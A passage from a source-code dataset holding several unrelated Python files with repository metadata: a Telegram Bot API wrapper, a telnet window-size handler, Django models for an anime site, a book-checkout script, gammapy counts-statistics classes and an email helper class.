                            ('vcard', vcard),
                            ('reply_to_message_id', reply_to_message_id),
                            ('reply_markup', reply_markup)):
        if supplied:
            payload[field] = supplied
    # Sent for any non-None value, including False.
    for field, supplied in (('disable_notification', disable_notification),
                            ('allow_sending_without_reply', allow_sending_without_reply),
                            ('protect_content', protect_content)):
        if supplied is not None:
            payload[field] = supplied
    return self.client.callApi("sendContact", payload)
def sendChatAction(self, chat_id, action):
    """Dispatch the ``sendChatAction`` Bot-API call (e.g. a "typing" hint).

    Both parameters are mandatory and sent verbatim.
    """
    return self.client.callApi("sendChatAction", {'chat_id': chat_id, 'action': action})
def sendMediaGroup(self, chat_id, media, disable_notification=None, reply_to_message_id=None, allow_sending_without_reply=None, protect_content=None):
    """Dispatch the ``sendMediaGroup`` Bot-API call (album of media items).

    ``chat_id`` and ``media`` are always sent.  ``reply_to_message_id`` is
    added only when truthy; the boolean-style flags are added whenever they
    are not ``None`` so an explicit ``False`` is still transmitted.
    """
    payload = {'chat_id': chat_id, 'media': media}
    if reply_to_message_id:
        payload['reply_to_message_id'] = reply_to_message_id
    for field, supplied in (('disable_notification', disable_notification),
                            ('allow_sending_without_reply', allow_sending_without_reply),
                            ('protect_content', protect_content)):
        if supplied is not None:
            payload[field] = supplied
    return self.client.callApi("sendMediaGroup", payload)
def sendVenue(self, chat_id, latitude, longitude, title, address, foursquare_id=None, foursquare_type=None, disable_notification=None, reply_to_message_id=None, reply_markup=None, allow_sending_without_reply=None, google_place_id=None, google_place_type=None, protect_content=None):
    """Dispatch the ``sendVenue`` Bot-API call through ``self.client.callApi``.

    The five positional parameters are always sent.  Place-identifier and
    markup options are added only when truthy; the boolean-style flags are
    added whenever they are not ``None`` so an explicit ``False`` is still
    transmitted.
    """
    payload = {'chat_id': chat_id, 'latitude': latitude, 'longitude': longitude,
               'title': title, 'address': address}
    # Skipped entirely when falsy.
    for field, supplied in (('foursquare_id', foursquare_id),
                            ('foursquare_type', foursquare_type),
                            ('reply_to_message_id', reply_to_message_id),
                            ('reply_markup', reply_markup),
                            ('google_place_id', google_place_id),
                            ('google_place_type', google_place_type)):
        if supplied:
            payload[field] = supplied
    # Sent for any non-None value, including False.
    for field, supplied in (('disable_notification', disable_notification),
                            ('allow_sending_without_reply', allow_sending_without_reply),
                            ('protect_content', protect_content)):
        if supplied is not None:
            payload[field] = supplied
    return self.client.callApi("sendVenue", payload)
def sendPoll(self, chat_id, question, options, is_anonymous=None, type=None, allows_multiple_answers=None, correct_option_id=None, explanation=None, explanation_parse_mode=None, open_period=None, close_date=None, is_closed=None, disable_notification=False, reply_to_message_id=None, allow_sending_without_reply=None, reply_markup=None, explanation_entities=None, protect_content=None):
    """Dispatch the ``sendPoll`` Bot-API call through ``self.client.callApi``.

    ``chat_id`` is stringified; ``question`` and ``options`` are sent as-is.
    Most optional fields are sent for any non-None value (so an explicit
    ``False``, e.g. ``is_closed=False``, still goes out).  Unlike the other
    methods in this class, ``disable_notification``, ``explanation_entities``
    and ``protect_content`` are gated on truthiness here, so an explicit
    ``False`` for those is dropped -- behaviour preserved from the original.
    Note: the ``type`` parameter name shadows the built-in but is part of the
    public signature and therefore kept.
    """
    payload = {'chat_id': str(chat_id), 'question': question, 'options': options}
    # Sent for any non-None value, including False / 0.
    for field, supplied in (('is_anonymous', is_anonymous),
                            ('type', type),
                            ('allows_multiple_answers', allows_multiple_answers),
                            ('correct_option_id', correct_option_id),
                            ('explanation', explanation),
                            ('explanation_parse_mode', explanation_parse_mode),
                            ('open_period', open_period),
                            ('close_date', close_date),
                            ('is_closed', is_closed),
                            ('reply_to_message_id', reply_to_message_id),
                            ('allow_sending_without_reply', allow_sending_without_reply),
                            ('reply_markup', reply_markup)):
        if supplied is not None:
            payload[field] = supplied
    # Skipped entirely when falsy (original gating kept for compatibility).
    for field, supplied in (('disable_notification', disable_notification),
                            ('explanation_entities', explanation_entities),
                            ('protect_content', protect_content)):
        if supplied:
            payload[field] = supplied
    return self.client.callApi("sendPoll", payload)
def stopPoll(self, chat_id, message_id, reply_markup=None):
    """Dispatch the ``stopPoll`` Bot-API call through ``self.client.callApi``.

    ``chat_id`` is stringified; ``reply_markup`` is sent only when truthy.
    """
    payload = {'chat_id': str(chat_id), 'message_id': message_id}
    if reply_markup:
        payload['reply_markup'] = reply_markup
    return self.client.callApi("stopPoll", payload)
def answerCallbackQuery(self, callback_query_id, text=None, show_alert=None, url=None, cache_time=None):
    """Dispatch the ``answerCallbackQuery`` Bot-API call.

    ``callback_query_id`` is mandatory.  ``text`` and ``url`` are sent only
    when truthy; ``show_alert`` and ``cache_time`` are sent for any non-None
    value, so an explicit ``False`` or ``0`` still goes out.
    """
    payload = {'callback_query_id': callback_query_id}
    for field, supplied in (('text', text), ('url', url)):
        if supplied:
            payload[field] = supplied
    for field, supplied in (('show_alert', show_alert), ('cache_time', cache_time)):
        if supplied is not None:
            payload[field] = supplied
    return self.client.callApi("answerCallbackQuery", payload)
def answerInlineQuery(self, inline_query_id, results, cache_time=None, is_personal=None, next_offset=None, switch_pm_text=None, switch_pm_parameter=None):
    """Dispatch the ``answerInlineQuery`` Bot-API call.

    ``inline_query_id`` and ``results`` are always sent.  ``cache_time``,
    ``is_personal`` and ``next_offset`` are sent for any non-None value
    (so ``next_offset=""``, which ends pagination, still goes out);
    ``switch_pm_text`` and ``switch_pm_parameter`` are sent only when truthy.
    """
    payload = {'inline_query_id': inline_query_id, 'results': results}
    for field, supplied in (('cache_time', cache_time),
                            ('is_personal', is_personal),
                            ('next_offset', next_offset)):
        if supplied is not None:
            payload[field] = supplied
    for field, supplied in (('switch_pm_text', switch_pm_text),
                            ('switch_pm_parameter', switch_pm_parameter)):
        if supplied:
            payload[field] = supplied
    return self.client.callApi("answerInlineQuery", payload)
| 15,952 | -6 | 885 |
e148ccaa2017c9088365c178882f6f4d7c85c4bb | 1,886 | py | Python | src/server/portal/naws.py | Kelketek/evennia | cc56a7155f4fb975a6fc9e811bd6eadf3d710243 | [
"BSD-3-Clause"
] | 5 | 2015-01-30T08:47:59.000Z | 2022-01-22T19:27:03.000Z | src/server/portal/naws.py | Kelketek/evennia | cc56a7155f4fb975a6fc9e811bd6eadf3d710243 | [
"BSD-3-Clause"
] | 2 | 2017-12-28T21:36:48.000Z | 2017-12-28T21:36:57.000Z | src/server/portal/naws.py | Kelketek/evennia | cc56a7155f4fb975a6fc9e811bd6eadf3d710243 | [
"BSD-3-Clause"
] | 1 | 2020-02-21T05:30:58.000Z | 2020-02-21T05:30:58.000Z | """
NAWS - Negotiate About Window Size
This implements the NAWS telnet option as per
https://www.ietf.org/rfc/rfc1073.txt
NAWS allows telnet clients to report their
current window size to the client and update
it when the size changes
"""
from django.conf import settings
from src.utils import utils
NAWS = chr(31)
IS = chr(0)
# default taken from telnet specification
DEFAULT_WIDTH = settings.CLIENT_DEFAULT_WIDTH
DEFAULT_HEIGHT = settings.CLIENT_DEFAULT_HEIGHT
# try to get the customized mssp info, if it exists.
class Naws(object):
"""
Implements the MSSP protocol. Add this to a
variable on the telnet protocol to set it up.
"""
def __init__(self, protocol):
"""
initialize NAWS by storing protocol on ourselves
and calling the client to see if it supports
NAWS.
"""
self.naws_step = 0
self.protocol = protocol
self.protocol.protocol_flags['SCREENWIDTH'] = {0: DEFAULT_WIDTH} # windowID (0 is root):width
self.protocol.protocol_flags['SCREENHEIGHT'] = {0: DEFAULT_HEIGHT} # windowID:width
self.protocol.negotiationMap[NAWS] = self.negotiate_sizes
self.protocol.do(NAWS).addCallbacks(self.do_naws, self.no_naws)
def no_naws(self, option):
"""
This is the normal operation.
"""
self.protocol.handshake_done()
def do_naws(self, option):
"""
Negotiate all the information.
"""
self.protocol.handshake_done()
| 30.419355 | 101 | 0.661188 | """
NAWS - Negotiate About Window Size
This implements the NAWS telnet option as per
https://www.ietf.org/rfc/rfc1073.txt
NAWS allows telnet clients to report their
current window size to the client and update
it when the size changes
"""
from django.conf import settings
from src.utils import utils
NAWS = chr(31)
IS = chr(0)
# default taken from telnet specification
DEFAULT_WIDTH = settings.CLIENT_DEFAULT_WIDTH
DEFAULT_HEIGHT = settings.CLIENT_DEFAULT_HEIGHT
# try to get the customized mssp info, if it exists.
class Naws(object):
"""
Implements the MSSP protocol. Add this to a
variable on the telnet protocol to set it up.
"""
def __init__(self, protocol):
"""
initialize NAWS by storing protocol on ourselves
and calling the client to see if it supports
NAWS.
"""
self.naws_step = 0
self.protocol = protocol
self.protocol.protocol_flags['SCREENWIDTH'] = {0: DEFAULT_WIDTH} # windowID (0 is root):width
self.protocol.protocol_flags['SCREENHEIGHT'] = {0: DEFAULT_HEIGHT} # windowID:width
self.protocol.negotiationMap[NAWS] = self.negotiate_sizes
self.protocol.do(NAWS).addCallbacks(self.do_naws, self.no_naws)
def no_naws(self, option):
"""
This is the normal operation.
"""
self.protocol.handshake_done()
def do_naws(self, option):
"""
Negotiate all the information.
"""
self.protocol.handshake_done()
def negotiate_sizes(self, options):
if len(options) == 4:
# NAWS is negotiated with 16bit words
width = options[0] + options[1]
self.protocol.protocol_flags['SCREENWIDTH'][0] = int(width.encode('hex'), 16)
height = options[2] + options[3]
self.protocol.protocol_flags['SCREENHEIGHT'][0] = int(height.encode('hex'), 16)
| 360 | 0 | 27 |
7da257725a70d5f7a7926bb43365cc244654dc62 | 4,026 | py | Python | apps/dramas/models.py | ChenCrazy/MacOnline | b954ce85c8d14ef65eb54b365b2573da792b2d2f | [
"MIT"
] | null | null | null | apps/dramas/models.py | ChenCrazy/MacOnline | b954ce85c8d14ef65eb54b365b2573da792b2d2f | [
"MIT"
] | null | null | null | apps/dramas/models.py | ChenCrazy/MacOnline | b954ce85c8d14ef65eb54b365b2573da792b2d2f | [
"MIT"
] | null | null | null | # _*_ encoding:utf-8 _*_
from __future__ import unicode_literals
from datetime import datetime
# from DjangoUeditor.models import UEditorField
from django.db import models
from organization.models import DramaOrg, Author
| 37.981132 | 115 | 0.696225 | # _*_ encoding:utf-8 _*_
from __future__ import unicode_literals
from datetime import datetime
# from DjangoUeditor.models import UEditorField
from django.db import models
from organization.models import DramaOrg, Author
class Drama(models.Model):
drama_org = models.ForeignKey(DramaOrg, verbose_name=u"团队组织", null=True, blank=True)
name = models.CharField(max_length=50, verbose_name=u"番剧名")
desc = models.CharField(max_length=300, verbose_name=u"番剧描述")
detail = models.TextField(verbose_name=u"番剧详情")
# detail = UEditorField(verbose_name=u"番剧详情",width=600, height=300, imagePath="dramas/ueditor/",
# filePath="dramas/ueditor/", default='')
is_banner = models.BooleanField(default=False, verbose_name=u"是否轮播")
# author = models.ForeignKey(Author, verbose_name=u"讲师", null=True, blank=True)
degree = models.CharField(verbose_name=u"级别", choices=(("cj", "初级"), ("zj", "中级"), ("gj", "高级")), max_length=2)
watch_times = models.IntegerField(default=0, verbose_name=u"欣赏时长(分钟数)")
appreciator = models.IntegerField(default=0, verbose_name=u'观看人数')
fav_nums = models.IntegerField(default=0, verbose_name=u'收藏人数')
image = models.ImageField(upload_to="dramas/%Y/%m", verbose_name=u"封面图", max_length=100)
click_nums = models.IntegerField(default=0, verbose_name=u"点击量")
# category = models.CharField(default=u"后端开发", max_length=20, verbose_name=u"类别")
# tag = models.CharField(default="", verbose_name=u"标签", max_length=10)
# youneed_know = models.CharField(default="", max_length=300, verbose_name=u"须知")
# author_tell = models.CharField(default="", max_length=300, verbose_name=u"作者有话说")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"番剧"
verbose_name_plural = verbose_name
def get_jj_nums(self):
# 获取视频集数
return self.serial_set.all().count()
get_jj_nums.short_description = "剧集数"
def go_to(self):
from django.utils.safestring import mark_safe
return mark_safe("<a href='http://www.projectsedu.com'>跳转</>")
go_to.short_description = "跳转"
def get_watch_users(self):
return self.userdrama_set.all()[:5]
def get_drama_serial(self):
# 获取番剧所有剧集
return self.serial_set.all()
def __unicode__(self):
return self.name
class BannerDrama(Drama):
class Meta:
verbose_name = "轮播"
verbose_name_plural = verbose_name
proxy = True
class Serial(models.Model):
drama = models.ForeignKey(Drama, verbose_name=u"番剧")
name = models.CharField(max_length=100, verbose_name=u"剧集名")
watch_times = models.IntegerField(default=0, verbose_name=u"欣赏时长(分钟数)")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"剧集"
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
def get_serial_video(self):
# 获取视频剧集
return self.video_set.all()
class Video(models.Model):
serial = models.ForeignKey(Serial, verbose_name=u"剧集")
name = models.CharField(max_length=100, verbose_name=u"番剧名")
watch_times = models.IntegerField(default=0, verbose_name=u"学习时长(分钟数)")
url = models.CharField(max_length=200, default="", verbose_name=u"访问地址")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"视频"
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
class DramaResource(models.Model):
drama = models.ForeignKey(Drama, verbose_name=u"番剧")
name = models.CharField(max_length=100, verbose_name=u"名称")
download = models.FileField(upload_to="dramas/resource/%Y/%m", verbose_name=u"资源文件", max_length=100)
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"资源"
verbose_name_plural = verbose_name
| 475 | 3,524 | 115 |
befa272aee7e1f6568b6b56d01d63869929c48e0 | 1,199 | py | Python | Year1Term1/IntroductionToProgramming/bookcheckout.py | linzexinmasterchief/University-Courseworks | e07b4b117941837108b0922dc0d5e32303cf66a3 | [
"Unlicense"
] | null | null | null | Year1Term1/IntroductionToProgramming/bookcheckout.py | linzexinmasterchief/University-Courseworks | e07b4b117941837108b0922dc0d5e32303cf66a3 | [
"Unlicense"
] | null | null | null | Year1Term1/IntroductionToProgramming/bookcheckout.py | linzexinmasterchief/University-Courseworks | e07b4b117941837108b0922dc0d5e32303cf66a3 | [
"Unlicense"
] | null | null | null | """
This file handles the checkout of books, with log entry added
"""
import database as db
# member_id is a 4-digit numebr and checkout_list is a list containing the full detail of the book being checked out
def go(checkout_list = [], member_id = "0"):
"""
This function takes in a list of books and a member id,
then modify the database.txt file so that these books are borrowed
by this member
"""
# since only the available books can be add to the checkout_list, there is no need to check again
for target_book in checkout_list:
result = db.modify_member_id(target_book[0], member_id)
# check if this checkout is succeed
if result == 0:
# add log entry
# target_book[0] is book id
db.checkout_log(target_book[0])
# stop checkout process and report back (highly unlikely)
return result
return 0
# test code
if __name__ == "__main__":
# go([
# [['32_0', '"La crise europeene et la premiere guerre mondiale"', 'Pierre Renouvin.', '1/5/2015', '0'],
# ['21_0', '"Institutions of economic growth"', 'J.P.Powelson', '30/3/2015', '0'],
# ])
pass | 36.333333 | 116 | 0.633028 | """
This file handles the checkout of books, with log entry added
"""
import database as db
# member_id is a 4-digit numebr and checkout_list is a list containing the full detail of the book being checked out
def go(checkout_list = [], member_id = "0"):
"""
This function takes in a list of books and a member id,
then modify the database.txt file so that these books are borrowed
by this member
"""
# since only the available books can be add to the checkout_list, there is no need to check again
for target_book in checkout_list:
result = db.modify_member_id(target_book[0], member_id)
# check if this checkout is succeed
if result == 0:
# add log entry
# target_book[0] is book id
db.checkout_log(target_book[0])
# stop checkout process and report back (highly unlikely)
return result
return 0
# test code
if __name__ == "__main__":
# go([
# [['32_0', '"La crise europeene et la premiere guerre mondiale"', 'Pierre Renouvin.', '1/5/2015', '0'],
# ['21_0', '"Institutions of economic growth"', 'J.P.Powelson', '30/3/2015', '0'],
# ])
pass | 0 | 0 | 0 |
1b6923ea2847cbbc0437e08a871182116547d68d | 554 | py | Python | modules/dbnd/src/targets/__init__.py | ipattarapong/dbnd | 7bd65621c46c73e078eb628f994127ad4c7dbd1a | [
"Apache-2.0"
] | null | null | null | modules/dbnd/src/targets/__init__.py | ipattarapong/dbnd | 7bd65621c46c73e078eb628f994127ad4c7dbd1a | [
"Apache-2.0"
] | null | null | null | modules/dbnd/src/targets/__init__.py | ipattarapong/dbnd | 7bd65621c46c73e078eb628f994127ad4c7dbd1a | [
"Apache-2.0"
] | null | null | null | import os
from targets.base_target import Target
from targets.data_target import DataTarget
from targets.dir_target import DirTarget
from targets.errors import (
FileAlreadyExists,
FileSystemException,
MissingParentDirectory,
NotADirectory,
)
from targets.file_target import FileSystemTarget, FileTarget
from targets.fs.file_system import FileSystem
from targets.fs.local import LocalFileSystem
from targets.inmemory_target import InMemoryTarget
from targets.target_factory import target
from targets.utils.atomic import AtomicLocalFile
| 30.777778 | 60 | 0.84657 | import os
from targets.base_target import Target
from targets.data_target import DataTarget
from targets.dir_target import DirTarget
from targets.errors import (
FileAlreadyExists,
FileSystemException,
MissingParentDirectory,
NotADirectory,
)
from targets.file_target import FileSystemTarget, FileTarget
from targets.fs.file_system import FileSystem
from targets.fs.local import LocalFileSystem
from targets.inmemory_target import InMemoryTarget
from targets.target_factory import target
from targets.utils.atomic import AtomicLocalFile
| 0 | 0 | 0 |
1035dcef4699f204f8ec305de84ef466c3c4f6fe | 9,168 | py | Python | gammapy/stats/counts_statistic.py | Rishank2610/gammapy | 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | [
"BSD-3-Clause"
] | 1 | 2017-11-22T17:07:56.000Z | 2017-11-22T17:07:56.000Z | gammapy/stats/counts_statistic.py | Rishank2610/gammapy | 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | [
"BSD-3-Clause"
] | null | null | null | gammapy/stats/counts_statistic.py | Rishank2610/gammapy | 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | [
"BSD-3-Clause"
] | 1 | 2019-09-04T14:03:33.000Z | 2019-09-04T14:03:33.000Z | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import abc
import numpy as np
from scipy.stats import chi2
from gammapy.utils.roots import find_roots
from .fit_statistics import cash, wstat
__all__ = ["WStatCountsStatistic", "CashCountsStatistic"]
class CashCountsStatistic(CountsStatistic):
"""Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable
with known background.
Parameters
----------
n_on : int
Measured counts
mu_bkg : float
Known level of background
"""
@property
def n_bkg(self):
"""Expected background counts"""
return self.mu_bkg
@property
def n_sig(self):
"""Excess"""
return self.n_on - self.n_bkg
@property
def error(self):
"""Approximate error from the covariance matrix."""
return np.sqrt(self.n_on)
@property
def stat_null(self):
"""Stat value for null hypothesis, i.e. 0 expected signal counts"""
return cash(self.n_on, self.mu_bkg + 0)
@property
def stat_max(self):
"""Stat value for best fit hypothesis, i.e. expected signal mu = n_on - mu_bkg"""
return cash(self.n_on, self.n_on)
class WStatCountsStatistic(CountsStatistic):
"""Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable
with unknown background.
Parameters
----------
n_on : int
Measured counts in on region
n_off : int
Measured counts in off region
alpha : float
Acceptance ratio of on and off measurements
mu_sig : float
Expected signal counts in on region
"""
@property
def n_bkg(self):
"""Known background computed alpha * n_off"""
return self.alpha * self.n_off
@property
def n_sig(self):
"""Excess"""
return self.n_on - self.n_bkg - self.mu_sig
@property
def error(self):
"""Approximate error from the covariance matrix."""
return np.sqrt(self.n_on + self.alpha ** 2 * self.n_off)
@property
def stat_null(self):
"""Stat value for null hypothesis, i.e. mu_sig expected signal counts"""
return wstat(self.n_on, self.n_off, self.alpha, self.mu_sig)
@property
def stat_max(self):
"""Stat value for best fit hypothesis, i.e. expected signal mu = n_on - alpha * n_off - mu_sig"""
return wstat(self.n_on, self.n_off, self.alpha, self.n_sig + self.mu_sig)
| 32.28169 | 106 | 0.584751 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import abc
import numpy as np
from scipy.stats import chi2
from gammapy.utils.roots import find_roots
from .fit_statistics import cash, wstat
__all__ = ["WStatCountsStatistic", "CashCountsStatistic"]
class CountsStatistic(abc.ABC):
@property
def ts(self):
"""Return stat difference (TS) of measured excess versus no excess."""
# Remove (small) negative TS due to error in root finding
ts = np.clip(self.stat_null - self.stat_max, 0, None)
return ts
@property
def sqrt_ts(self):
"""Return statistical significance of measured excess.
The sign of the excess is applied to distinguish positive and negative fluctuations.
"""
return np.sign(self.n_sig) * np.sqrt(self.ts)
@property
def p_value(self):
"""Return p_value of measured excess.
Here the value accounts only for the positive excess significance (i.e. one-sided).
"""
return 0.5 * chi2.sf(self.ts, 1)
def compute_errn(self, n_sigma=1.0):
"""Compute downward excess uncertainties.
Searches the signal value for which the test statistics is n_sigma**2 away from the maximum.
Parameters
----------
n_sigma : float
Confidence level of the uncertainty expressed in number of sigma. Default is 1.
"""
errn = np.zeros_like(self.n_on, dtype="float")
min_range = self.n_sig - 2 * n_sigma * (self.error + 1)
it = np.nditer(errn, flags=["multi_index"])
while not it.finished:
roots, res = find_roots(
self._stat_fcn,
min_range[it.multi_index],
self.n_sig[it.multi_index],
nbin=1,
args=(self.stat_max[it.multi_index] + n_sigma ** 2, it.multi_index),
)
if np.isnan(roots[0]):
errn[it.multi_index] = -self.n_on[it.multi_index]
else:
errn[it.multi_index] = roots[0] - self.n_sig[it.multi_index]
it.iternext()
return errn
def compute_errp(self, n_sigma=1):
"""Compute upward excess uncertainties.
Searches the signal value for which the test statistics is n_sigma**2 away from the maximum.
Parameters
----------
n_sigma : float
Confidence level of the uncertainty expressed in number of sigma. Default is 1.
"""
errp = np.zeros_like(self.n_on, dtype="float")
max_range = self.n_sig + 2 * n_sigma * (self.error + 1)
it = np.nditer(errp, flags=["multi_index"])
while not it.finished:
roots, res = find_roots(
self._stat_fcn,
self.n_sig[it.multi_index],
max_range[it.multi_index],
nbin=1,
args=(self.stat_max[it.multi_index] + n_sigma ** 2, it.multi_index),
)
errp[it.multi_index] = roots[0]
it.iternext()
return errp - self.n_sig
def compute_upper_limit(self, n_sigma=3):
"""Compute upper limit on the signal.
Searches the signal value for which the test statistics is n_sigma**2 away from the maximum
or from 0 if the measured excess is negative.
Parameters
----------
n_sigma : float
Confidence level of the upper limit expressed in number of sigma. Default is 3.
"""
ul = np.zeros_like(self.n_on, dtype="float")
min_range = self.n_sig
max_range = self.n_sig + 2 * n_sigma * (self.error + 1)
it = np.nditer(ul, flags=["multi_index"])
while not it.finished:
ts_ref = self._stat_fcn(min_range[it.multi_index], 0.0, it.multi_index)
roots, res = find_roots(
self._stat_fcn,
min_range[it.multi_index],
max_range[it.multi_index],
nbin=1,
args=(ts_ref + n_sigma ** 2, it.multi_index),
)
ul[it.multi_index] = roots[0]
it.iternext()
return ul
def n_sig_matching_significance(self, significance):
"""Compute excess matching a given significance.
This function is the inverse of `significance`.
Parameters
----------
significance : float
Significance
Returns
-------
n_sig : `numpy.ndarray`
Excess
"""
n_sig = np.zeros_like(self.n_bkg, dtype="float")
it = np.nditer(n_sig, flags=["multi_index"])
while not it.finished:
lower_bound = np.sqrt(self.n_bkg[it.multi_index]) * significance
# find upper bounds for secant method as in scipy
eps = 1e-4
upper_bound = lower_bound * (1 + eps)
upper_bound += eps if upper_bound >= 0 else -eps
roots, res = find_roots(
self._n_sig_matching_significance_fcn,
lower_bound=lower_bound,
upper_bound=upper_bound,
args=(significance, it.multi_index),
nbin=1,
method="secant",
)
n_sig[it.multi_index] = roots[0] # return NaN if fail
it.iternext()
return n_sig
class CashCountsStatistic(CountsStatistic):
"""Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable
with known background.
Parameters
----------
n_on : int
Measured counts
mu_bkg : float
Known level of background
"""
def __init__(self, n_on, mu_bkg):
self.n_on = np.asanyarray(n_on)
self.mu_bkg = np.asanyarray(mu_bkg)
@property
def n_bkg(self):
"""Expected background counts"""
return self.mu_bkg
@property
def n_sig(self):
"""Excess"""
return self.n_on - self.n_bkg
@property
def error(self):
"""Approximate error from the covariance matrix."""
return np.sqrt(self.n_on)
@property
def stat_null(self):
"""Stat value for null hypothesis, i.e. 0 expected signal counts"""
return cash(self.n_on, self.mu_bkg + 0)
@property
def stat_max(self):
"""Stat value for best fit hypothesis, i.e. expected signal mu = n_on - mu_bkg"""
return cash(self.n_on, self.n_on)
def _stat_fcn(self, mu, delta=0, index=None):
return cash(self.n_on[index], self.mu_bkg[index] + mu) - delta
def _n_sig_matching_significance_fcn(self, n_sig, significance, index):
TS0 = cash(n_sig + self.mu_bkg[index], self.mu_bkg[index])
TS1 = cash(n_sig + self.mu_bkg[index], self.mu_bkg[index] + n_sig)
return np.sign(n_sig) * np.sqrt(np.clip(TS0 - TS1, 0, None)) - significance
class WStatCountsStatistic(CountsStatistic):
"""Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable
with unknown background.
Parameters
----------
n_on : int
Measured counts in on region
n_off : int
Measured counts in off region
alpha : float
Acceptance ratio of on and off measurements
mu_sig : float
Expected signal counts in on region
"""
def __init__(self, n_on, n_off, alpha, mu_sig=None):
self.n_on = np.asanyarray(n_on)
self.n_off = np.asanyarray(n_off)
self.alpha = np.asanyarray(alpha)
if mu_sig is None:
self.mu_sig = np.zeros_like(self.n_on)
else:
self.mu_sig = np.asanyarray(mu_sig)
@property
def n_bkg(self):
"""Known background computed alpha * n_off"""
return self.alpha * self.n_off
@property
def n_sig(self):
"""Excess"""
return self.n_on - self.n_bkg - self.mu_sig
@property
def error(self):
"""Approximate error from the covariance matrix."""
return np.sqrt(self.n_on + self.alpha ** 2 * self.n_off)
@property
def stat_null(self):
"""Stat value for null hypothesis, i.e. mu_sig expected signal counts"""
return wstat(self.n_on, self.n_off, self.alpha, self.mu_sig)
@property
def stat_max(self):
"""Stat value for best fit hypothesis, i.e. expected signal mu = n_on - alpha * n_off - mu_sig"""
return wstat(self.n_on, self.n_off, self.alpha, self.n_sig + self.mu_sig)
def _stat_fcn(self, mu, delta=0, index=None):
return (
wstat(
self.n_on[index],
self.n_off[index],
self.alpha[index],
(mu + self.mu_sig[index]),
)
- delta
)
def _n_sig_matching_significance_fcn(self, n_sig, significance, index):
stat0 = wstat(
n_sig + self.n_bkg[index], self.n_off[index], self.alpha[index], 0
)
stat1 = wstat(
n_sig + self.n_bkg[index],
self.n_off[index],
self.alpha[index],
n_sig,
)
return np.sign(n_sig) * np.sqrt(np.clip(stat0 - stat1, 0, None)) - significance
| 1,416 | 5,049 | 185 |
86aeeee5627ee8b07a01f9042f2d7316ad96cdd1 | 7,123 | py | Python | _common/C_mail.py | FNNDSC/cruntesting | d3580a8494f3b3da100669262ec99d9eceb32327 | [
"MIT"
] | 1 | 2017-01-17T06:52:17.000Z | 2017-01-17T06:52:17.000Z | _common/C_mail.py | FNNDSC/cruntesting | d3580a8494f3b3da100669262ec99d9eceb32327 | [
"MIT"
] | null | null | null | _common/C_mail.py | FNNDSC/cruntesting | d3580a8494f3b3da100669262ec99d9eceb32327 | [
"MIT"
] | null | null | null | # NAME
#
# C_mail
#
# DESCRIPTION
#
# 'C_mail' is a simple class for handling/abstracting common
# email related activities.
#
# Once setup with address lists, and/or subject text
# it sends body text and inline attachments.
#
# HISTORY
#
# 11 January 2007
# o Initial development implementation.
#
# System imports
import os
import os.path
import sys
import string
import datetime
import smtplib
from cgi import *
from email.MIMEImage import MIMEImage
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
# 3rd party imports
#from configobj import ConfigObj
# SCIN imports
#from _common.systemMisc import *
#import systemMisc
| 25.99635 | 69 | 0.628527 | # NAME
#
# C_mail
#
# DESCRIPTION
#
# 'C_mail' is a simple class for handling/abstracting common
# email related activities.
#
# Once setup with address lists, and/or subject text
# it sends body text and inline attachments.
#
# HISTORY
#
# 11 January 2007
# o Initial development implementation.
#
# System imports
import os
import os.path
import sys
import string
import datetime
import smtplib
from cgi import *
from email.MIMEImage import MIMEImage
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
# 3rd party imports
#from configobj import ConfigObj
# SCIN imports
#from _common.systemMisc import *
#import systemMisc
class C_mail :
#
# Member variables
#
# - Core variables - generic
mstr_obj = 'C_mail'; # name of object class
mstr_name = 'void'; # name of object variable
mstr_def = 'void'; # name of function being processed
m_id = -1; # id of agent
m_iter = 0; # current iteration in an
# arbitrary processing
# scheme
m_verbosity = 0; # debug related value for
# object
m_warnings = 0; # show warnings
# (and warnings level)
#
# - Class variables
# Core variables - specific
#
mlstr_to = [] # recipient list
mstr_from = "" # from string
mstr_subject = "" # subject string
mstr_body = "" # body text
mlstr_attach = [] # list of files to attach
mstr_SMTPserver = "localhost"
def to_set(self, alstr_to):
self.mlstr_to = alstr_to
def from_set(self, astr_from):
self.mstr_from = astr_from
def subject_set(self, astr_subject):
self.mstr_subject = astr_subject
def body_set(self, astr_body):
self.mstr_body = astr_body
def attach_set(self, alstr_attach):
self.mlstr_attach = alstr_attach
def SMTPserver_set(self, astr_STMPserver):
self.mstr_SMTPserver
#
# Methods
#
# Core methods - construct, initialise, id
def error_exit( self,
astr_action,
astr_error,
aexitCode):
print "%s:: FATAL ERROR" % self.mstr_obj
print "\tSorry, some error seems to have occurred in <%s::%s>" \
% (self.mstr_obj, self.mstr_def)
print "\tWhile %s" % astr_action
print "\t%s" % astr_error
print ""
print "Returning to system with error code %d" % aexitCode
sys.exit(aexitCode)
def core_construct( self,
astr_obj = 'C_mail',
astr_name = 'void',
a_id = -1,
a_iter = 0,
a_verbosity = 0,
a_warnings = 0) :
self.mstr_obj = astr_obj
self.mstr_name = astr_name
self.m_id = a_id
self.m_iter = a_iter
self.m_verbosity = a_verbosity
self.m_warnings = a_warnings
def reconstruct(self, alstr_to = "",
astr_from = "",
astr_subject = "",
astr_body = "",
alstr_attach = ""
):
mlstr_to = alstr_to
mstr_from = astr_from
mstr_subject = astr_subject
mstr_body = astr_body
mlstr_attach = alstr_attach
def __init__(self, **header):
#
# PRECONDITIONS
# o None - all arguments are optional
#
# POSTCONDITIONS
# o Any arguments specified in the **header are
# used to initialize internal variables.
#
self.core_construct()
